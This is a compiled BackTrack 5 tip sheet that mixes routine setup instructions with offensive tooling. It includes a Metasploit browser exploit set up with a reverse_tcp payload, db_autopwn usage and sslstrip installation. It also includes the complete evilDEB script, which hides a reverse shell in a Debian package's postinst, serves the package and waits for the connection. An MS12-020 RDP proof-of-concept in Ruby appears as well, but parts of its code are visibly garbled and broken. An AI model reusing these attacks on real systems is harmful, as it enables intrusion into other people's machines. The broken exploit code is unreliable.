
1. Video player on BackTrack 5 R1 - R2


sudo add-apt-repository ppa:rvm/smplayer
sudo apt-get update
sudo apt-get install smplayer smtube

2. Updating BackTrack 5 R1 [ONLY FOR R1]


wget http://bl4ck5w4n.tk/wp-content/uploads/2011/08/bt5migrate.tar
tar -xvf bt5migrate.tar
cd bt5migrate
python bt5migrate.py
3. db_autopwn [TUTORIAL]
1) First install Ruby
sudo apt-get install ruby libruby rdoc
sudo apt-get install libyaml-ruby

sudo apt-get install libzlib-ruby


sudo apt-get install libopenssl-ruby
sudo apt-get install libdl-ruby
sudo apt-get install libreadline-ruby
sudo apt-get install libiconv-ruby
sudo apt-get install rubygems

2) Install PostgreSQL
sudo apt-get install postgresql postgresql-client postgresql-contrib
sudo apt-get install pgadmin3

3) Set up the password for postgres


sudo su postgres -c psql
ALTER USER postgres WITH PASSWORD 'your password';
\q
sudo passwd -d postgres
sudo su postgres -c passwd

Now enter the same password that you used previously('your password').

3) Use the gem command to install ActiveRecord and the PostgreSQL driver for Ruby:
sudo gem1.8 install activerecord
sudo gem1.8 install postgres

IF YOU CANNOT INSTALL postgres, YOU PROBABLY NEED TO INSTALL ruby1.8-dev:

sudo apt-get install ruby1.8-dev

IF YOU STILL CANNOT INSTALL postgres, YOU NEED libpq-dev:
sudo apt-get install libpq-dev

Now rerun
sudo gem1.8 install postgres

4) Download the Unix tarball from the Framework website (http://metasploit.com/framework/download) and extract it to the directory of your choice.

5) Go to the extracted Framework directory and from there run


su postgres

Enter the password ('your password') you have set before.

6) Now run Metasploit:


./msfconsole
load db_postgres
db_create test
db_hosts

The last command should not return any error.

db_nmap <IP ADDRESS TO TEST> -p 445

This records the host in the database; db_autopwn will later use the exploits matching open port 445.
Check that you are doing it against the correct IP:
db_hosts

DO NOT USE IT ON OTHER IPs THAT YOU DO NOT HAVE AUTHORISATION FOR. THIS IS TO DO A SECURITY TEST ON THE MACHINES YOU ARE AUTHORISED FOR.

Start the exploitation:

db_autopwn -t -p -e -s -b

To see the meaning of these options, type:

db_autopwn

This will show you the options used in the previous command.
If successful, it will generate some active sessions:

sessions -l

To use an active session do this, where i is the number of the session:
sessions -i i

4. EXPLOIT [windows/browser/ms10_042_helpctr_xss_cmd_exec]

Open terminal:

root@bt:~# msfconsole
msf > use windows/browser/ms10_042_helpctr_xss_cmd_exec
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set lhost [your IP]
lhost => [your IP]
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set rport 4444
rport => 4444
msf exploit(ms10_042_helpctr_xss_cmd_exec) > exploit

5. Installing VirtualBox on Backtrack 5 R1 or R2


If you have BackTrack installed on HDD or as a dual boot, you can install VirtualBox inside BackTrack. The commands are listed below:

root@bt # prepare-kernel-sources
root@bt # cd /usr/src/linux
root@bt # cp -rf include/generated/* include/linux/

After this is done, add the VirtualBox repository to /etc/apt/sources.list as shown below, import its signing key and install VirtualBox. The key is fetched over plain HTTP, so compare the fingerprint shown by apt-key finger with the one Oracle publishes before running apt-get update:
root@bt # echo deb http://download.virtualbox.org/virtualbox/debian lucid contrib non-free >> /etc/apt/sources.list
root@bt # wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -
root@bt # apt-get update
root@bt # apt-cache search virtualbox
root@bt # apt-get install virtualbox-4.0
6. Updating and cleaning BackTrack 5 R1-R2 [SCRIPT]
DOWNLOAD SCRIPT: http://www.2shared.com/file/9CNvJLRy/bt5up.html
Open and run the script in a terminal :)

7. How to install LINUX/UNIX/BACKTRACK *.tar.gz tarball files - QUICK TUTORIAL

FOR BEGINNERS
I SEE THAT MOST PEOPLE DON'T KNOW HOW TO EXTRACT AND INSTALL TAR.GZ, TAR.BZ2, TBZ2 AND TGZ FILES, SO HERE IS A QUICK TUTORIAL FOR YOU:
How to install Linux / UNIX *.tar.gz tarball files
How do I install tar.gz files under Linux?

A. tar.gz, also known as a tarball, is an archive format for data and software. Most Linux tarballs contain the source code of a program. If you are new to Linux, I recommend using the apt-get, rpm or yum commands to install binary packages instead.

A tarball is a group of files packed into one file. Tarball files have the extension .tar.gz, .tgz or .tar.bz2. Most open source software uses tarballs to distribute programs and source code.
1: Uncompress the tarball

To uncompress them, execute the following command(s) depending on the extension:


root@bt: tar -zxvf file.tar.gz
root@bt: tar -zxf file.tgz
root@bt: tar -jxf file.tar.bz2
root@bt: tar -jxf file.tbz2

Now change directory


root@bt: ls
root@bt: cd path-to-software/

2: Build and install software

Generally you need to type the following 3 commands to build and install the software:
root@bt:# ./configure
root@bt:# make
root@bt:# make install

Where,

./configure will configure the software to ensure your system has the necessary
functionality and libraries to successfully compile the package
make will compile all the source files into executable binaries.
Finally, make install will install the binaries and any supporting files into the appropriate
locations.

3: Read INSTALL / README file

Each tarball comes with installation and build instructions. Open the INSTALL or README file for more information.
You can use the kate or gedit text editor to open the README and INSTALL files.
gedit comes with BackTrack; kate can be installed with this command:
root@bt:~# apt-get install kate
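Two checks worth running before the extract / configure / make install sequence above, as an added example that is not part of the original tutorial: compare the archive's SHA-256 with the value the project publishes next to its download, and refuse archives whose member names would be written outside the build directory. The sample archives, the demo-1.0 name and the --demo switch are constructed for this illustration; GNU tar and coreutils are assumed.

```shell
#!/bin/sh
# Added example, not from the tutorial: checks to run before "tar -zxvf file.tar.gz" and
# "make install" as root. EXPECTED_SHA256 is the digest the project publishes; the member
# check catches archives whose entries have absolute paths or ".." components and would
# land outside the current directory when extracted.

# tarball_sha256 FILE -> SHA-256 hex digest of FILE
tarball_sha256() {
    sha256sum "$1" | cut -d' ' -f1
}

# unsafe_entries FILE -> archive members that escape the extraction directory (empty if none)
unsafe_entries() {
    tar -tzf "$1" | grep -E '^/|(^|/)\.\.(/|$)' || true
}

# check_tarball FILE EXPECTED_SHA256 -> 0 when FILE matches the digest and has no unsafe members
check_tarball() {
    actual=$(tarball_sha256 "$1")
    if [ "$actual" != "$2" ]; then
        echo "checksum mismatch for $1: got $actual, expected $2" >&2
        return 1
    fi
    bad=$(unsafe_entries "$1")
    if [ -n "$bad" ]; then
        printf 'refusing to extract %s, suspicious members:\n%s\n' "$1" "$bad" >&2
        return 1
    fi
    return 0
}

# make_sample_tarballs DIR -> writes two constructed archives into DIR for the demonstration:
#   DIR/demo-1.0.tar.gz  ordinary source layout (demo-1.0/Makefile)
#   DIR/evil-1.0.tar.gz  same files, member names rewritten to start with "../" (GNU tar --transform)
make_sample_tarballs() {
    mkdir -p "$1/demo-1.0"
    printf 'all:\n\t@echo built\n' > "$1/demo-1.0/Makefile"
    tar -czf "$1/demo-1.0.tar.gz" -C "$1" demo-1.0
    tar -czf "$1/evil-1.0.tar.gz" --transform 's,^demo-1.0,../demo-1.0,' -C "$1" demo-1.0
}

if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d); make_sample_tarballs "$d"
    # the "published" digest is computed from the good archive itself for the demo
    check_tarball "$d/demo-1.0.tar.gz" "$(tarball_sha256 "$d/demo-1.0.tar.gz")" && echo "demo-1.0.tar.gz: ok to extract"
    check_tarball "$d/evil-1.0.tar.gz" "$(tarball_sha256 "$d/evil-1.0.tar.gz")" || echo "evil-1.0.tar.gz: rejected"
    rm -rf "$d"
fi
```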

8. Install sslstrip for sniffing on BackTrack


root@bt:~# sslstrip
sslstrip: command not found
FIX: Download sslstrip from http://www.thoughtcrime.org/software/sslstrip/
Then:
root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
sslstrip-0.9/
sslstrip-0.9/README
sslstrip-0.9/COPYING
sslstrip-0.9/setup.py
sslstrip-0.9/sslstrip/
sslstrip-0.9/sslstrip/StrippingProxy.py

sslstrip-0.9/sslstrip/SSLServerConnection.py
sslstrip-0.9/sslstrip/ServerConnectionFactory.py
sslstrip-0.9/sslstrip/ClientRequest.py
sslstrip-0.9/sslstrip/ServerConnection.py
sslstrip-0.9/sslstrip/CookieCleaner.py
sslstrip-0.9/sslstrip/__init__.py
sslstrip-0.9/sslstrip/DnsCache.py
sslstrip-0.9/sslstrip/URLMonitor.py
sslstrip-0.9/lock.ico
sslstrip-0.9/sslstrip.py
root@bt:~# cd sslstrip-0.9
root@bt:~/sslstrip-0.9# python setup.py install
running install
running build
running build_py
creating build
creating build/lib.linux-i686-2.6
creating build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-i686-2.6/sslstrip

copying sslstrip/DnsCache.py -> build/lib.linux-i686-2.6/sslstrip


copying sslstrip/CookieCleaner.py -> build/lib.linux-i686-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
running install_lib
creating /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/ServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/ServerConnectionFactory.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/StrippingProxy.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/SSLServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/ClientRequest.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/__init__.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/URLMonitor.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/DnsCache.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/CookieCleaner.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py to ServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py to ServerConnectionFactory.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py to StrippingProxy.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py to SSLServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py to ClientRequest.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py to __init__.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py to URLMonitor.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py to DnsCache.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py to CookieCleaner.pyc
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
creating /usr/local/share/sslstrip
copying README -> /usr/local/share/sslstrip
copying COPYING -> /usr/local/share/sslstrip
copying lock.ico -> /usr/local/share/sslstrip
running install_egg_info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up
root@bt:~/sslstrip-0.9# sslstrip
9. Nessus installation on BackTrack
root@bt:~# apt-get install nessus
root@bt:~# /opt/nessus/sbin/nessus-adduser
Login : your username

Login password : your password

For registration go to http://www.nessus.org/register/

Type your first name, last name and e-mail, tick "Check to receive updates from Tenable" and click Register.
Check your mail for the registration key, then run:
root@bt:~# /opt/nessus/bin/nessus-fetch --register YOUR KEY
root@bt:~# /etc/init.d/nessusd start
With Mozilla go to
https://your-ip-address:8834

10. Adding New Users in BackTrack 5

Do you know how to add or create a new user in BackTrack 5 R1 or R2, and why you have to do that? The main reason for creating a new user with fewer privileges than root is security.
With a default installation of BackTrack 5 R1 or R2 you will find only one user in the operating system: root (the superuser). It is very dangerous for us to run as root because root has full privileges in the operating system.
If you are logged in as root, your system is more vulnerable to external attacks. From the root account one can manage other users' accounts, administer user data, install new applications, configure system services and more. You can also end up destroying your own operating system if you mess up with the root account.
So it is more practical to log in as a normal user and use sudo when necessary.
To create a new user, you can use the command (a) adduser or (b) useradd. Both commands create a new user account in BackTrack 5 R1 (tested with the Gnome version).
Code:
adduser [options] [--home DIR] [--shell SHELL] [--no-create-home] [--uid ID] [--firstuid ID] [--lastuid ID] [--ingroup GROUP | --gid ID] [--disabled-password] [--disabled-login] [--gecos GECOS] [--add_extra_groups] [--encrypt-home] <username>
Example:
adduser userOne
If you execute a line such as the example above, userOne will be created as a normal user. For more details, type man adduser.

11. Managing Users in BackTrack 5

How to log in as another user in the terminal
Open up your terminal. Then type the command below:
su - <username>
This will change your current login user in the terminal to the <username> account. If you want to log out from that user, just type exit.
How to change a user's password
Type passwd in the terminal. It will prompt you to change the current user's password. If you are root and would like to change another user's password, type:
passwd <username>
Adding a new group in BackTrack
Typing groupadd <groupname> is sufficient.
How to create another root user
I don't know, but if you want to add another user with root privileges, you can just edit the user's groups. You may set the user's primary group to root or add group root as the user's secondary group. But to me, this is a bad security practice. Why would you want to have several root users?
usermod -g <primarygroupname> -G <secondarygroupname> <username>
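Only UID 0 actually confers root privilege; putting a user in group root, as the usermod line above does, grants that group's file permissions and nothing more. Either way it is worth knowing which accounts on a box are root-equivalent, so here is an added example (not from the original tutorial) that lists them from passwd and group files. The sample passwd and group contents, the backdoor and ops account names and the --demo switch are constructed for the illustration.

```shell
#!/bin/sh
# Added example, not from the tutorial: find root-equivalent accounts.
# All functions take the passwd / group file to inspect as an argument, so they can be
# run against /etc/passwd and /etc/group or against the constructed sample below.

# uid0_accounts PASSWD -> users other than root whose UID is 0 (these ARE root)
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# gid0_primary PASSWD -> users other than root whose primary group is GID 0 (usermod -g root)
gid0_primary() {
    awk -F: '$4 == 0 && $1 != "root" { print $1 }' "$1"
}

# root_group_members GROUP -> users listed as supplementary members of group root (usermod -G root)
root_group_members() {
    awk -F: '$1 == "root" && $4 != "" { n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] }' "$1"
}

# root_equivalent_accounts PASSWD GROUP -> union of the three lists, sorted, one name per line
root_equivalent_accounts() {
    { uid0_accounts "$1"; gid0_primary "$1"; root_group_members "$2"; } | sort -u
}

# write_sample_files DIR -> constructed passwd and group files for the demonstration:
#   backdoor has UID 0 (a second root), ops has primary GID 0, userOne and ops are in group root
write_sample_files() {
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
userOne:x:1000:1000:User One,,,:/home/userOne:/bin/bash
backdoor:x:0:0::/root:/bin/bash
ops:x:1001:0:ops:/home/ops:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
EOF
    cat > "$1/group" <<'EOF'
root:x:0:userOne,ops
users:x:100:
userOne:x:1000:
EOF
}

if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d); write_sample_files "$d"
    echo "second UID 0 accounts:"; uid0_accounts "$d/passwd"
    echo "all root-equivalent accounts:"; root_equivalent_accounts "$d/passwd" "$d/group"
    rm -rf "$d"
fi
```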
12. evilDEB-v0.1.sh Metasploit script for hacking Ubuntu
#!/bin/bash
# (C)opyright 2010 - g0tmi1k
# evilDEB.sh (v0.1 2010-07-30)

# Network interface (check with ifconfig) e.g. eth0


interface=eth0

# Settings *** Dont touch ***
export ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
export port=$(shuf -i 2000-65000 -n 1)
export version="0.1"

if [ "$(id -u)" != "0" ]; then echo -e "\e[00;31m[-]\e[00m Not a superuser." 1>&2; cleanup; fi

trap 'cleanup' 2 # Interrupt - "Ctrl + C"


function cleanup() {
echo
echo -e "\e[01;32m[>]\e[00m Cleaning up..."
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Killing 'Programs'" -e "killall python"
if [ "$debug" == "false" ]; then xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -rf evilDEB/"; fi
echo -e "\e[01;36m[>]\e[00m Done! (= Have you... g0tmi1k?"
exit 0
}

function help() {
echo "(C)opyright 2010 g0tmi1k ~ http://g0tmi1k.blogspot.com

Usage: bash evilDEB.sh -i [interface] -d [file]

Common options:
-i --- Network interface (check with ifconfig) e.g. eth0
-d --- DEB file to use

"
exit 1
}

echo -e "\e[01;36m[*]\e[00m g0tmilk's evilDEB v$version"


debFile=""

while getopts "d:i:m:dh?" OPTIONS; do
  case ${OPTIONS} in
    d ) export debFile=$OPTARG;;
    i ) export interface=$OPTARG;;
    ?|h ) help;;
    * ) echo "\e[00;31m[-]\e[00m Unknown option.";; # DEFAULT
  esac
done

echo -e "\e[01;32m[>]\e[00m Checking environment..."


if [ -z "$(pgrep python)" ]; then
  xterm -geometry 75x8+100+0 -T "evilDEB v$version - Killing 'Programs'" -e "killall python"
fi

if [ -e "/tmp/evilDEB" ]; then
  xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -rf /tmp/evilDEB/"
fi

mkdir -p /tmp/evilDEB/
cd /tmp/evilDEB/

if [ "$debFile" == "" ]; then


echo -e "\e[01;32m[>]\e[00m Downloading .DEB..."
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Downloading DEB..." -e "apt-get -d install xbomb"
mv /var/cache/apt/archives/xbomb_2.1a-7_i386.deb ./
debFile="xbomb_2.1a-7_i386.deb"
else
cp $debFile ./
ls
fi

echo -e "\e[01;32m[>]\e[00m Extracting .DEB..."


mkdir -p extracted/{DEBIAN,tmp}
dpkg -x $debFile extracted/
ar p $debFile control.tar.gz | tar zx
cp control extracted/DEBIAN/

echo -e "\e[01;32m[>]\e[00m Creating payload..."


xterm -geometry 75x8+100+0 -T "evilDEB v$version - Creating exploit" -e "/opt/metasploit3/msf3/msfpayload linux/x86/shell_reverse_tcp LHOST=$ourIP LPORT=$port X > /tmp/evilDEB/extracted/tmp/g0tmi1k"

echo -e "\e[01;32m[>]\e[00m Injecting payload..."

if [ -e "postinst" ]; then
  echo -e "\nsudo chmod 2755 /tmp/g0tmi1k && nohup /tmp/g0tmi1k >/dev/null 2>&1 &" >> postinst
else
  echo -e "#! /bin/sh\n\nsudo chmod 2755 /tmp/g0tmi1k && nohup /tmp/g0tmi1k >/dev/null 2>&1 &" > postinst
fi
mv postinst extracted/DEBIAN/

echo -e "\e[01;32m[>]\e[00m Creating .DEB file..."


chmod 755 extracted/DEBIAN/postinst
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Creating DEB..." -e "dpkg-deb --build /tmp/evilDEB/extracted"
mv extracted.deb evilDEB-${debFile##*/}

echo -e "\e[01;32m[>]\e[00m Running web server... (http://$ourIP:8000)"


#xterm -geometry 75x8+100+0 -T "evilDEB v$version - Running web server..." -e "/etc/init.d/apache2 start"
if [ "$debug" == "false" ]; then
  xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -rf /tmp/evilDEB/extracted"
  xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -f /tmp/evilDEB/{changelog,control,postint}"
  xterm -geometry 75x8+100+0 -T "evilDEB v$version - Running web server..." -e "python -m SimpleHTTPServer"&
else
  python -m SimpleHTTPServer &
fi

echo -e "\e[01;32m[>]\e[00m Running metasploit..."


/opt/metasploit/msf3/msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=$ourIP LPORT=$port E

cleanup
13. [FIX] Black screen after startx (BT 5 R2)
After googling I found how to fix the black screen.
I found it on the forum backtrack-linux.org/forums:
http://www.backtrack-linux.org/forums/showthread.php?t=48737

Insert the live DVD.

In GRUB press TAB to edit the boot line.

You will see something like this: file=/cdrom/preseed/ubuntu.seed boot=casper initrd=/casper/initrd.gz

Add xforcevesa noapic noapci nosplash irqpoll -- after initrd.gz

Put the code after "boot=casper" because "initrd=/casper/initrd.gz" wasn't there (BT 5r2 gnome x64).

I tried it and it works!!!!

I hope it helps you!!!!!!
14. Microsoft Security Bulletin MS12-020 - Critical
Working exploit for MS12-020 RDP flaw found
This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system.

The ruby script can be found at http://blog.binaryninjas.org/?p=58

or here:
just copy and paste it and save it as ms12-020-POC-attempt.rb,
set execute permissions in the file properties and run it in a terminal.
example:
root@bt: ruby ms12-020-POC-attempt.rb 192.168.1.123
(ruby ms12-020-POC-attempt.rb <victim ip address>)

____________________________________________________________________________
#!/usr/bin/env ruby

# ms12-020 PoC attempt


##
# NOTE: This was crafted based on a legit connection packet capture and reversing
# a packet capture of the the chinese PoC.
#
# by Joshua J. Drake (jduck)
#

require 'socket'

def send_tpkt(sd, data)
  sd.write(make_tpkt(data))
end

def make_tpkt(data)
[
3, # version
0, # reserved
4 + data.length
].pack('CCn') + data
end

def make_x224(data)
[ data.length ].pack('C') + data
end

def make_rdp(type, flags, data)
  [ type, flags, 4 + data.length ].pack('CCv') + data
end

host = ARGV.shift

sd = TCPSocket.new(host, 3389)
pkts1 = []

# craft connection request

rdp = make_rdp(1, 0, [ 0 ].pack('V'))

x224_1 = make_x224([
  0xe0, # Connection request
  0,    # ??
  0,    # SRC-REF
  0     # Class : Class 0
].pack('CnnC') + rdp)

pkts1

# craft connect-initial
x224_2 = make_x224([
0xf0, # Data / Class 0
0x80 # EOT: True / NR: 0
].pack('CC'))

# mcsCi
target_params = ""+
  #"\x02\x01\x00"+ # maxChannelIds
  "\x02\x01\x22"+ # maxChannelIds
  "\x02\x01\x0a"+ # maxUserIds
  "\x02\x01\x00"+ # maxTokenIds
  "\x02\x01\x01"+ # numPriorities
  "\x02\x01\x00"+ # minThroughput
  "\x02\x01\x01"+ # maxHeight
  "\x02\x02\xff\xff"+ # maxMCSPDUSize
  "\x02\x01\x02" # protocolVersion
min_params = ""+
  "\x02\x01\x01"+ # maxChannelIds
  "\x02\x01\x01"+ # maxUserIds
  "\x02\x01\x01"+ # maxTokenIds
  "\x02\x01\x01"+ # numPriorities
  "\x02\x01\x00"+ # minThroughput
  "\x02\x01\x01"+ # maxHeight
  "\x02\x02\x04\x20"+ # maxMCSPDUSize
  "\x02\x01\x02" # protocolVersion
max_params = ""+
  "\x02\x02\xff\xff"+ # maxChannelIds
  "\x02\x02\xfc\x17"+ # maxUserIds
  "\x02\x02\xff\xff"+ # maxTokenIds
  "\x02\x01\x01"+ # numPriorities
  "\x02\x01\x00"+ # minThroughput
  "\x02\x01\x01"+ # maxHeight
  "\x02\x02\xff\xff"+ # maxMCSPDUSize
  "\x02\x01\x02" # protocolVersion

userdata = ""+
# gccCCrq
"\x00\x05\x00\x14"+
"\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63"+"\x61\x81\x1c"+

# clientCoreData
"\x01\xc0"+"\xd8\x00"+ # header (type, len)
"\x04\x00"+"\x08\x00"+ # version
"\x80\x02"+ # desktop width
"\xe0\x01"+ # desktop height
"\x01\xca"+ # color depth
"\x03\xaa"+ # SASSequence
"\x09\x04\x00\x00" + # keyboard layout
"\xce\x0e\x00\x00" + # client build number
# client name
"\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x04\x00\x00\x00"+ # keyboard type
"\x00\x00\x00\x00"+ # kbd subType
"\x0c\x00\x00\x00"+ # kbd FuncKey
# imeFileName
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x01\xca"+ # postBeta2ColorDepth
"\x01\x00"+ # clientProductId
"\x00\x00\x00\x00" + # serialNumber
"\x10\x00"+ # highColorDepth
"\x07\x00"+ # supportedColorDepths

"\x01\x00"+ # earlyCapabilityFlags
# clientDigProductId -poc has: "00000-000-0000000-00000"
"\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00"+
"\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"+
"\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"+ # connectionType
"\x00"+ # pad1octet
"\x00\x00\x00\x00"+ # serverSelectedProtocol
"\x04\xc0\x0c\x00"+ # desktopPhysicalWidth
"\x0d\x00\x00\x00"+ # desktopPhysicalHeight
"\x00\x00\x00\x00"+ # reserved
# clientSecurityData
"\x02\xc0"+"\x0c\x00"+ # header (type, len)
"\x1b\x00\x00\x00"+ # encryptionMethods
"\x00\x00\x00\x00"+ # extEncryptionMethods
# clientNetworkData
"\x03\xc0"+"\x2c\x00"+ # header (type, len)
"\x03\x00\x00\x00"+ # channel count!
# channel 0
"rdpdr\x00\x00\x00"+ # name
"\x00\x00\x80\x80"+ # options
# channel 1
"cliprdr\x00"+ # name
"\x00\x00\xa0\xc0"+ # options
# channel 2
"rdpsnd\x00\x00"+ # name
"\x00\x00\x00\xc0" # options
# clientClusterData (not present)
# clientMonitorData (not present)

mcs_data = ""+
"\x04\x01\x01"+ # callingDomainSelector
"\x04\x01\x01"+ # calledDomainSelector
"\x01\x01\xff"+ # upwardFlag
"\x30" + [ target_params.length ].pack('C') + target_params +
"\x30" + [ min_params.length ].pack('C') + min_params +
"\x30" + [ max_params.length ].pack('C') + max_params +
# userData
"\x04\x82" + [ userdata.length ].pack('n') + userdata

mcs = "\x7f\x65\x82" + [ mcs_data.length ].pack('n') # connect-initial (0x65 / 101), length


mcs

pkts1

# send a special one?


#pkts1

# send more pkts! - based on poc

8.times {
pkts1
}

#pkts1
#pkts1
#pkts1
#pkts1
#pkts1
pkts1
#pkts1
#pkts1
#pkts1

pkts1

bigpkt = pkts1.join('')

20.times { |x|
puts "[*] Sending #{x + 1} ..."
sd.write(bigpkt)

send_tpkt(sd, x224_2 + "\x2e\x00\x00\x01")


#send_tpkt(sd, x224_2 + "\x2e\x00\x00\x02")
#send_tpkt(sd, x224_2 + "\x2e\x00\x00\x03")

#send_tpkt(sd, x224_2 + "\x2e\x00\x00\x04")

# read connect-initial response


buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
}

sd.close
15. ghost-phisher-1.3
1. Update Algorithm
2. Penetration (Metasploit Binding)
3. Support for cloning HTTPS
4. Smarter Algorithm for HTTP Servers
5. Smarter HTML parsing
6. DHCP restructure and verbosity
7. Resolution adjustment for Netbook Users (F3 button)
8. User interface adjustments
9. Automatic redirections after payload download
10. Custom payload and generic vulnerability page support
Requirements:

python
python-qt4
dhcp3-server

xterm
subversion
To install, simply run the following command in a terminal after changing directory to the path where the downloaded package is:
root@host:~# dpkg -i ghost-phisher_1.3_all.deb
Icons and running the application:
The software icon can be found in the application menu of the GNOME desktop interface.
The icon can also be found in /usr/share/applications for KDE and also GNOME:
there you find "Ghost Phisher.desktop".
To get the source code for this project from SVN, here is the checkout link:
root@host:~# svn checkout http://ghost-phisher.googlecode.com/svn/Ghost-Phisher
Ghost Phisher Penetration Screenshots
Ghost Phisher ships with default Windows and Linux vulnerability pages. These pages can be used for penetration. Ghost automatically recognizes the remote operating system and displays the vulnerability pages according to the information fetched.
16. Change MAC address in BackTrack
In the terminal type:
root@bt: ifconfig -a
You will now see a list of network interfaces, chipset details and their MAC addresses. Pick the interface that corresponds to the network card you want to spoof the MAC address on. In this example I will use eth0.
First we need to bring the interface down. To do this we type the following command into the shell:
root@bt: ifconfig eth0 down
To change your MAC address, type the following command into the shell window, swapping out 11:22:33:44:55:66 for the MAC address you want to use:
root@bt: macchanger --mac=11:22:33:44:55:66 eth0
Now we need to bring the interface back up. To do this we type the following command into the shell:

root@bt: ifconfig eth0 up

To verify our newly assigned MAC address we can query the interface again using:
root@bt: ifconfig -a
17. Change IP address in BackTrack...
In the terminal type: ifconfig
Now you see your IP address and interface (wlan or eth).
To change the IP address:
ifconfig <your interface> <new ip address>
example: ifconfig wlan0 192.168.202.124
Now type ifconfig again to get the network info:
you have a new IP address!!!!!
18. Some useful commands in BackTrack.....
Common apt commands
apt-get install <package>  Downloads <package> and all of its dependencies, and installs or upgrades them.
apt-get remove [--purge] <package>  Removes <package> and any packages that depend on it. --purge specifies that packages should be purged.
apt-get update  Updates package listings from the repo; should be run at least once a week.
apt-get upgrade  Upgrades all currently installed packages with the updates available from the repo; should be run once a week.
apt-get dist-upgrade [-u]  Similar to apt-get upgrade, except that dist-upgrade will install or remove packages to satisfy dependencies.
apt-cache search <pattern>  Searches packages and descriptions for <pattern>.
apt-cache show <package>  Shows the full description of <package>.
